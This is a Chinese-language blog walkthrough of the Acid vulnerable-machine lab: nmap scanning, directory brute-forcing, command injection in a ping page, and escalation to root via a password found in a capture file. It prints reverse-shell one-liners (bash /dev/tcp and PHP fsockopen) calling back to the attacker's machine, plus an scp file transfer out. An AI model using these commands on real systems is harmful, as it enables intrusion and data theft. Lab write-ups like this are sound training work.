Acid靶机练习

Acid靶机练习

网络结构:

环境搭建平台为VMware15,网络为nat模式,网段192.168.1.0/24

网络由攻击机kali、靶机组成

靶机ip:192.168.1.140

kali linux ip:192.168.1.137

信息收集:

主机发现:

1
nmap -sP 192.168.1.0/24

下图中192.168.1.1为VMnet8网卡地址,1.3为网关地址,1.137为攻击机地址,因此推测目标主机地址为192.168.1.140

image-20210203223609124

端口扫描:

可以看到目标机器使用了Apache作为中间件,开放了33447端口

1
nmap -p 1-65535 -A 192.168.1.140 -sV

image-20210204093237048

访问一下看看,发现是一个静态页面,扫描一下目录看看

首先用dirb扫一下,已经用了big的字典,但扫到的目录条目还是很少

image-20210204100917676

再用dirbuster爆破目录

选好字典,爆破目录选择根目录

点击start开始爆破,得到了比较全面的爆破结果

image-20210204202104586

漏洞挖掘:

访问查看各条目,challenge目录下是一个登录页面,先放着不管

image-20210204202215238

一路向下访问,到cake.php条目下的时候,可以看到标签页上出现了一个目录名Magic_Box,结合页面上的话,另外页面叫cake.php,这个目录应该是有用的

image-20210204204000254

再次爆破这个Magic_Box目录

image-20210204222202012

image-20210204224446448

得到的结果中有一个command.php,访问后发现是一个可以执行ping命令的页面

image-20210204224626144

测试命令注入,提交参数后并没有回显信息,burp抓包看一下,果然,信息是有的,只是没有直接回显到页面

image-20210204225054147

用ifconfig测试一下,发现果然存在命令注入

image-20210204225212133

尝试反弹shell

1
bash -i >& /dev/tcp/192.168.1.137/4444 0>&1

image-20210205175956076

kali端监听4444端口

image-20210205173317428

未果,反弹失败,尝试转url编码,依旧反弹失败

image-20210205175147349

尝试其他的反弹方式

1
;php -r '$sock=fsockopen("192.168.1.137",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

反弹成功

提权:

首先查看passwd文件,看一下用户

着重关注acid、saman两个用户

image-20210205200204389

查看一下这两个用户的文件

1
find / -user saman 2>/dev/null

image-20210205200354607

find / -user acid 2>/dev/null

image-20210205200506712

在acid的文件中可以看到一个抓包文件hunt.pcapng,显得格格不入,我们通过ssh把它复制下来,这里因为kali linux为保证安全性,ssh是默认禁止连接的,需要修改配置文件,这里我直接使用了另外一台centos来接收文件,ip为192.168.1.131

首先取得一个交互shell,以进行下一步操作,在原本shell中输入以下命令

1
python -c "import pty;pty.spawn('/bin/bash');"

然后使用命令scp来复制传输文件,如图传输成功

1
scp /sbin/raw_vs_isi/hint.pcapng root@192.168.1.131:/root/hint.pcapng

image-20210205201641880

拿到抓包文件后,用wireshark打开

image-20210205201844205

逐包查看,未果,可以分数据包种类跟踪流,查看数据包信息

追踪tcp流时,可以看到saman用户的密码

image-20210205202141370

我们切换到此用户saman,成功切换,之后再尝试用户saman切换root,发现有权限,切换成功,提权至root

image-20210205202547170

参考文章:https://www.freebuf.com/column/200518.html


作者:C0mpactDisk,本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!